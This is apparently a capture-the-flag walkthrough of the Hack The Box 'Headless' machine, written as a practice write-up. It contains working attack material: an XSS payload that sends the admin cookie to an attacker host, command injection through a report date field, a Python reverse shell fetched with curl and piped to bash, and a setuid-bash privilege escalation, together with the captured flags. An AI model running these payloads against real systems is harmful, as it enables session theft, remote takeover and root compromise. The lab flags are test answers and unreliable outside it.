HTB - Headless [Easy]
TCP Scan
> TARGET=10.129.131.79 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXBmWeZYo1LR50JTs8iKyICHT76i7+fBPoeiKDXRhzjsfMWruwHrosHoSwRxiqUdaJYLwJgWOv+jFAB45nRQHw=
| 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICkBEMKoic0Bx5yLYG4DIT5G797lraNQsG5dtyZUl9nW
5000/tcp open upnp? syn-ack ttl 63
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.2.2 Python/3.11.2
| Date: Sun, 24 Mar 2024 19:41:27 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 2799
| Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Under Construction</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f7f7f7;
| margin: 0;
| padding: 0;
| display: flex;
| justify-content: center;
| align-items: center;
| height: 100vh;
| .container {
| text-align: center;
| background-color: #fff;
| border-radius: 10px;
| box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
port 5000
> curl -I http://10.129.131.79:5000/
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.11.2
Date: Sun, 24 Mar 2024 19:42:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2799
Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
Connection: close
InVzZXIiis base64 encoded:userCan send post on
/support
POST /support HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=test&lname=test&email=test%40test.com&phone=test&message=test
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.11.2
Date: Sun, 24 Mar 2024 19:52:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2363
Connection: close
- dirsearch
> dirsearch -u http://10.129.131.79
[08:50:26] 401 - 317B - /dashboard
[08:52:14] 200 - 2KB - /support
Given different values on the
/dashboardendpoint, the response is different, this could be the entry point. curl http://10.129.131.79:5000/dashboard -H “Cookie: is_admin=YWRtaW4K.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/”With a
<>in the message, it triggers a different message, which indicatesUser-Agentis injectable
> curl http://10.129.131.79:5000/support -d 'fname=test&lname=test&email=test%40test.com&phone=test&message=%3C%3E%0D%0A'
<body>
<div class="container">
<h1>Hacking Attempt Detected</h1>
<p>Your IP address has been flagged, a report with your browser information has been sent to the administrators for investigation.</p>
<p><strong>Client Request Information:</strong></p>
<pre><strong>Method:</strong> POST<br><strong>URL:</strong> http://10.129.131.79:5000/support<br><strong>Headers:</strong> <strong>Host:</strong> 10.129.131.79:5000<br><strong>User-Agent:</strong> curl/8.5.0<br><strong>Accept:</strong> */*<br><strong>Content-Length:</strong> 75<br><strong>Content-Type:</strong> application/x-www-form-urlencoded<br><br></pre>
</div>
</body>
- to get the admin cookie
POST /support HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: <img src=x onerror=fetch('http://10.10.16.59/'+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1
fname=test&lname=test&email=test%40test.com&phone=test&message=%3c%3e
10.129.131.79 - - [25/Mar/2024 10:31:27] "GET /is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 404 -
- change the cookie to the above, and access
http://10.129.131.79:5000/dashboard - The dashboard contains a report generation feature, and the
datefield is susceptible to injection
POST /dashboard HTTP/1.1
Host: 10.129.131.79:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.129.131.79:5000
Connection: close
Referer: http://10.129.131.79:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1
date=2023-09-15;id
<div id="output-container">
<div id="output-content" style="background-color: green; color: white; padding: 10px; border-radius: 5px;">
Systems are up and running!
uid=1000(dvir) gid=1000(dvir) groups=1000(dvir),100(users)
</div>
</div>
- create a shell.sh file
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.59",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
> curl http://10.129.131.79:5000/dashboard -H 'Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -d 'date=2023-09-15;curl http://10.10.16.59/shell.sh|bash'
└─# nc -vnlp 4444
listening on [any] 4444 ...
connect to [10.10.16.59] from (UNKNOWN) [10.129.131.79] 60574
/bin/sh: 0: can't access tty; job control turned off
$ cat user.txt
cat: user.txt: No such file or directory
$ cd
$ ls
app
geckodriver.log
user.txt
$ cat user.txt
3b7b54e5434287668ab540ae02ffb54d
$
pe
- upload linpeas
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 175 Sep 10 2023 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 95 Sep 10 2023 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 567 Sep 10 2023 /etc/ssh/ssh_host_rsa_key.pub
- check the sudo script
dvir@headless:~$ cat /usr/bin/syscheck
#!/bin/bash
if [ "$EUID" -ne 0 ]; then
exit 1
fi
last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"
disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"
load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
/usr/bin/echo "Database service is not running. Starting it..."
./initdb.sh 2>/dev/null
else
/usr/bin/echo "Database service is running."
fi
exit 0
initdb.shis injectable
dvir@headless:~$ echo 'chmod +s /usr/bin/bash' > initdb.sh
echo 'chmod +s /usr/bin/bash' > initdb.sh
dvir@headless:~$ chmod +x initdb.sh
chmod +x initdb.sh
dvir@headless:~$ ls -la
ls -la
total 1052
drwx------ 8 dvir dvir 4096 Mar 25 00:02 .
drwxr-xr-x 3 root root 4096 Sep 9 2023 ..
drwxr-xr-x 3 dvir dvir 4096 Feb 16 23:49 app
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 .bash_history -> /dev/null
-rw-r--r-- 1 dvir dvir 220 Sep 9 2023 .bash_logout
-rw-r--r-- 1 dvir dvir 3393 Sep 10 2023 .bashrc
drwx------ 12 dvir dvir 4096 Sep 10 2023 .cache
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:05 geckodriver.log -> /dev/null
drwx------ 3 dvir dvir 4096 Mar 24 23:53 .gnupg
-rwxr-xr-x 1 dvir dvir 23 Mar 25 00:02 initdb.sh
drwx------ 4 dvir dvir 4096 Feb 16 23:49 .local
-rw-r--r-- 1 dvir dvir 860549 Mar 24 23:51 l.sh
-rw-r--r-- 1 dvir dvir 156037 Mar 24 23:54 l.txt
drwx------ 3 dvir dvir 4096 Sep 10 2023 .mozilla
-rw-r--r-- 1 dvir dvir 807 Sep 9 2023 .profile
lrwxrwxrwx 1 dvir dvir 9 Feb 2 16:06 .python_history -> /dev/null
drwx------ 2 dvir dvir 4096 Mar 24 23:39 .ssh
-rw-r----- 1 root dvir 33 Mar 21 14:06 user.txt
dvir@headless:~$ sudo syscheck
sudo syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.7G
System load average: 0.04, 0.07, 0.05
Database service is not running. Starting it...
dvir@headless:~$ ls -ls /usr/bin/bash
ls -ls /usr/bin/bash
1236 -rwsr-sr-x 1 root root 1265648 Apr 24 2023 /usr/bin/bash
dvir@headless:~$ bash -p
bash -p
id
uid=1000(dvir) gid=1000(dvir) euid=0(root) egid=0(root) groups=0(root),100(users),1000(dvir)
cat /root/root.txt
d61e1777a8e707984607f0ec1e7f67f1
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack